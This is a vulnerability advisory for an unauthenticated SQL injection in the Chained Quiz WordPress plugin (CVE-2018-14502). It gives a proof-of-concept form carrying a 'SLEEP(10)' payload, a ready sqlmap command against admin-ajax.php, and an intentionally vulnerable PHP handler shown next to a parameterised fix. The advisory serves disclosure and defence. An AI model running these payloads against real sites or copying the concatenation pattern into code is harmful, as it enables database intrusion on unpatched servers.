Chained Quiz <= 1.0.8 - Unauthenticated SQL Injection



Description
WordPress plugin Chained Quiz before 1.0.9 allows remote unauthenticated users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters.

Technical details:

Chained Quiz appears to be vulnerable to time-based SQL injection.
The issue lies in the "$answer" backend variable.
Privileges required: None
Proof of Concept
The following exploit will cause the SQL query to execute and sleep for 10 seconds:

<html>
  <body>
    <form action="http://target/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="answer" value="8 AND SLEEP(10)" />
      <input type="hidden" name="question_id" value="194" />
      <input type="hidden" name="quiz_id" value="581" />
      <input type="hidden" name="post_id" value="3199" />
      <input type="hidden" name="question_type" value="radio" />
      <input type="hidden" name="points" value="0" />
      <input type="hidden" name="action" value="chainedquiz_ajax" />
      <input type="hidden" name="chainedquiz_action" value="answer" />
      <input type="hidden" name="total_questions" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Using SQLMAP:

sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=5&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T
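As an added defender's illustration (not the plugin's own code; the table and column names are assumptions), the concatenation pattern behind the "$answer" finding is shown beside a handler that validates the ids and binds them with $wpdb->prepare():

```php
<?php
// Added illustration, not code from the Chained Quiz plugin: the injection pattern the
// advisory describes beside a hardened handler. Table and column names are assumed.

// VULNERABLE: POST values are concatenated straight into the SQL, so an 'answer' such as
// "8 AND SLEEP(10)" is executed as SQL and the response is delayed by ten seconds.
function chainedquiz_answer_vulnerable() {
    global $wpdb;
    $answer      = $_POST['answer'];
    $question_id = $_POST['question_id'];
    $sql = "SELECT points FROM {$wpdb->prefix}chainedquiz_choices "
         . "WHERE id = $answer AND question_id = $question_id";
    return $wpdb->get_var($sql);
}

// HARDENED: enforce the expected type first (choice and question ids are integers), then
// bind every value through $wpdb->prepare() so user input can never alter the query text.
function chainedquiz_answer_fixed() {
    global $wpdb;
    $question_id = absint($_POST['question_id'] ?? 0);
    $answer      = absint($_POST['answer'] ?? 0);
    // 'answers' carries several choice ids for checkbox questions; sanitise each element.
    $answers     = array_filter(array_map('absint', (array) ($_POST['answers'] ?? [])));
    if ($question_id === 0 || ($answer === 0 && empty($answers))) {
        wp_send_json_error('invalid parameters', 400);
    }
    if ($answer !== 0) {
        $sql = $wpdb->prepare(
            "SELECT points FROM {$wpdb->prefix}chainedquiz_choices "
            . "WHERE id = %d AND question_id = %d",
            $answer, $question_id
        );
        return $wpdb->get_var($sql);
    }
    // One %d placeholder per submitted id; prepare() accepts the values as a single array.
    $placeholders = implode(',', array_fill(0, count($answers), '%d'));
    $sql = $wpdb->prepare(
        "SELECT SUM(points) FROM {$wpdb->prefix}chainedquiz_choices "
        . "WHERE id IN ($placeholders) AND question_id = %d",
        array_merge(array_values($answers), [$question_id])
    );
    return $wpdb->get_var($sql);
}
```

With the hardened handler, a non-numeric 'answer' is reduced to 0 by absint() and rejected before any query runs, so a time-based probe produces a 400 response with no delay.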

Affects Plugin

Fixed in version 1.0.9

References

CVE 2018-14502
URL https://plugins.trac.wordpress.org/browser/chained-quiz/trunk/readme.txt#L114

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Çlirim Emini
Submitter Website https://www.sentry.co.com/
Views 1551
Verified No
WPVDB ID 9112

Timeline

Publicly Published 2018-08-16
Added 2018-08-17
Last Updated 2018-08-29

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.